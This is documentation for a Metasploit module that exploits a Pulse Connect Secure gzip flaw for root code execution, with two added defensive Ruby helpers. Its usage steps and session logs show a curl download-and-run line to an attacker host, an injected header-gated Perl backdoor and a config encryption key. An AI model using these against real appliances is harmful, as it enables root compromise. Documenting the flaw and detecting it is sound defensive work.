## Vulnerable Application

The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability that allows an authenticated attacker to overwrite arbitrary files, resulting in remote code execution as root. Admin credentials are required for successful exploitation.

NCC Group described several different ways to achieve RCE through the gzip vulnerability in their findings. This module uses the Template Toolkit method, which works up to 9.1R8 (possibly later), whereas the other methods were patched earlier. Because the payload is sent inside the Perl template, this method also has no bad characters.

Of note, MANY binaries are not in `$PATH` but are located in `/home/bin/`. Thanks to @wvu for pointing that out.

A Pulse Secure Connect trial can be downloaded here.
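The affected range above ("before 9.1R9") is the fact a defender needs first. The following Ruby helper is an added example, not code from the Metasploit module or from NCC Group's research: it reduces both version notations that appear on this page (the `9.1R8` release notation and the `Version 9.1, revision 8, build 7453` wording the module logs) to a comparable triple and reports whether a given appliance still needs the fix. The inventory hostnames and version strings are constructed for the example.

```ruby
# Added example: triage Pulse Connect Secure version strings against the
# affected range stated on this page (everything before 9.1R9).
# Not part of the Metasploit module; hostnames below are made up.

PATCHED = [9, 1, 9].freeze   # first release with the fix, 9.1R9

# Accepts "9.1R8", "9.1R11.4" or "Version 9.1, revision 8, build 7453 ..."
# and returns [major, minor, revision]; nil when the string is not recognised.
def parse_pcs_version(str)
  if (m = str.match(/\A\s*(\d+)\.(\d+)R(\d+)/i))
    return m.captures.map(&:to_i)
  end
  if (m = str.match(/Version\s+(\d+)\.(\d+),\s*revision\s+(\d+)/i))
    return m.captures.map(&:to_i)
  end
  nil
end

# true  -> version sorts before 9.1R9 and is affected
# false -> 9.1R9 or later
# nil   -> version could not be parsed, so nothing can be concluded
def vulnerable_version?(str)
  v = parse_pcs_version(str)
  return nil if v.nil?
  (v <=> PATCHED) == -1
end

# Constructed inventory for the example (hostnames and versions are made up)
INVENTORY = {
  "vpn-a.example.test" => "9.1R8",
  "vpn-b.example.test" => "Version 9.1, revision 9, build 0000 found",
  "vpn-c.example.test" => "unknown"
}.freeze

# Map every host to a triage status so the result can be acted on directly.
def triage(inventory = INVENTORY)
  inventory.transform_values do |ver|
    case vulnerable_version?(ver)
    when true  then :patch_required
    when false then :not_affected_by_this_bug
    else            :version_unknown
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  triage.each { |host, status| puts "#{host}: #{status}" }
end
```

Unparseable versions are deliberately reported as unknown rather than as safe, so a banner that changes format cannot silently drop a host from the patch list.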
## Verification Steps

- Install the server
- Start msfconsole
- Do: `use exploit/linux/http/pulse_secure_gzip_rce`
- Do: `set rhosts [IP]`
- Do: `set ssl true`
- Do: `set username [username]`
- Do: `set password [password]`
- Do: `run`
- You should get a root shell
## Options

### cmd

If this option is set, a single command is run instead of the payload. Defaults to `` (empty).
## Scenarios

### Pulse Connect Secure 9.1R8 build 7453, Meterpreter Payload

```
[*] Processing pulse.rb for ERB directives.
resource (pulse.rb)> use exploit/linux/http/pulse_secure_gzip_rce
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (pulse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (pulse.rb)> set rport 443
rport => 443
resource (pulse.rb)> set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
resource (pulse.rb)> set username pulse
username => pulse
resource (pulse.rb)> set password pulsepulse
password => pulsepulse
resource (pulse.rb)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (pulse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (pulse.rb)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf6 exploit(linux/http/pulse_secure_gzip_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Exploiting...
[*] Using URL: http://1.1.1.1:8080/X8ZY2uaHuTrbj9
[*] 2.2.2.2 - Attempting login to: https://2.2.2.2:443/dana-na/auth/url_admin/login.cgi
[*] 2.2.2.2 - Finding Version
[*] 2.2.2.2 - Version 9.1, revision 8, build 7453 found
[*] 2.2.2.2 - Version is vulnerable
[*] 2.2.2.2 - Exploit trigger will be at https://2.2.2.2:443/dana-na/auth/setcookie.cgi with a header of OPUYNYOI
[*] 2.2.2.2 - curl -so /tmp/xScfkrKh http://1.1.1.1:8080/X8ZY2uaHuTrbj9;chmod +x /tmp/xScfkrKh;/tmp/xScfkrKh;rm -f /tmp/xScfkrKh
[*] 2.2.2.2 - Perl code being injected
if( length $ENV{HTTP_OPUYNYOI}){
system("/home/bin/curl -so /tmp/xScfkrKh http://1.1.1.1:8080/X8ZY2uaHuTrbj9");
chmod 0777, "/tmp/xScfkrKh";
system("env /tmp/xScfkrKh");
}
[*] 2.2.2.2 - Encrypting config with exploit backdoor
[*] 2.2.2.2 - [*] Key: 7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5
[*] 2.2.2.2 - [*] IV: df14482b2b3f9e24
[*] 2.2.2.2 - [+] Encrypted header: 8ae8e163
[*] 2.2.2.2 - [*] Digest: 5e457443190f0015e0949bdd19bbae0d
[*] 2.2.2.2 - [*] Hash: cb269d28ab81904636fac81d57ecdd37
[*] 2.2.2.2 - Requesting backup config page
[*] 2.2.2.2 - Uploading encrypted config backup
[*] 2.2.2.2 - Triggering RCE
[*] Client 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /X8ZY2uaHuTrbj9
[*] Sending payload to 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Sending stage (976712 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:30418) at 2020-11-08 22:15:58 -0500
[*] 2.2.2.2 - Request timed out, most likely due to obtaining a session!
[*] 2.2.2.2 - Logging out to prevent warnings to other admins
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 2.2.2.2
OS : (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
```
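The session output above shows the shape of what lands in a template after a successful run: a Perl block that reads a request header from `%ENV` and runs a command only when that header is present. For incident responders checking a restored or suspect appliance backup, the following Ruby scanner is an added example, not part of the Metasploit module or of Pulse Secure's software. It walks template text and reports every header-gated command execution with its line number and header name. The `[% PERL %]` wrapper in the constructed sample is an assumption about how such a block would sit in a Template Toolkit file; the Perl inside it is the `uname -a` variant logged by the module further down this page.

```ruby
# Added example: flag Perl in Template Toolkit template text that gates a
# command on the presence of an HTTP request header. Not part of the module;
# the sample templates below are constructed for this example.

HEADER_GATE  = /\$ENV\{(HTTP_[A-Z0-9_]+)\}/        # Perl reading a request header
COMMAND_EXEC = /\b(?:system|exec)\s*\(|`[^`]+`/     # Perl spawning a process

# Returns one finding per header-gated execution:
#   { line: <1-based line of the gate>, header: "HTTP_...", command: "<exec line>" }
# `window` is how many lines past the gate to look for the command it protects.
def scan_template(text, window: 5)
  lines = text.lines
  findings = []
  lines.each_with_index do |line, idx|
    next unless (gate = line.match(HEADER_GATE))
    body = lines[idx, window]
    exec_line = body.find { |l| l =~ COMMAND_EXEC }
    next unless exec_line
    findings << { line: idx + 1, header: gate[1], command: exec_line.strip }
  end
  findings
end

# Constructed sample: an ordinary template with no embedded Perl
CLEAN_TEMPLATE = <<~TT
  [% INCLUDE header.thtml %]
  <p>[% msg %]</p>
TT

# Constructed sample: the [% PERL %] wrapper is assumed; the Perl inside is
# the header-gated command shown in the module's "cmd" scenario on this page.
BACKDOORED_TEMPLATE = <<~TT
  [% INCLUDE header.thtml %]
  [% PERL %]
  if( length $ENV{HTTP_YHAVWSXI}){
  system("uname -a");
  }
  [% END %]
TT

if __FILE__ == $PROGRAM_NAME
  { "clean.thtml" => CLEAN_TEMPLATE, "suspect.thtml" => BACKDOORED_TEMPLATE }.each do |name, text|
    hits = scan_template(text)
    puts "#{name}: #{hits.empty? ? 'no header-gated execution' : hits.inspect}"
  end
end
```

Because the gate and the command may be separated by other statements, the scanner searches a short window after each `$ENV{HTTP_...}` reference rather than requiring them on the same line; widen `window` if templates under review are more verbose.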
### Pulse Connect Secure 9.1R8 build 7453, cmd Execution

```
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set cmd 'uname -a'
cmd => uname -a
msf6 exploit(linux/http/pulse_secure_gzip_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Exploiting...
[*] Using URL: http://1.1.1.1:8080/9fy9OzRRf7zJo4c
[*] 2.2.2.2 - Attempting login to: https://2.2.2.2:443/dana-na/auth/url_admin/login.cgi
[*] 2.2.2.2 - Finding Version
[*] 2.2.2.2 - Version 9.1, revision 8, build 7453 found
[*] 2.2.2.2 - Version is vulnerable
[*] 2.2.2.2 - Exploit trigger will be at https://2.2.2.2:443/dana-na/auth/setcookie.cgi with a header of YHAVWSXI
[*] 2.2.2.2 - Perl code being injected
if( length $ENV{HTTP_YHAVWSXI}){
system("uname -a");
}
[*] 2.2.2.2 - Encrypting config with exploit backdoor
[*] 2.2.2.2 - [*] Key: 7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5
[*] 2.2.2.2 - [*] IV: ab94ad78a3897ab8
[*] 2.2.2.2 - [+] Encrypted header: 37fffeb3
[*] 2.2.2.2 - [*] Digest: 42a0340dfb408186f7d3ce177218fa18
[*] 2.2.2.2 - [*] Hash: 6ad4c2b6b800c4c9db1e2c345d4a9e8c
[*] 2.2.2.2 - Requesting backup config page
[*] 2.2.2.2 - Uploading encrypted config backup
[*] 2.2.2.2 - Triggering RCE
[*] 2.2.2.2 - Command Output:
Linux localhost2 2.6.32-00025-g841d072-dirty #1 SMP Mon Jul 20 17:51:26 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[*] 2.2.2.2 - Logging out to prevent warnings to other admins
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
```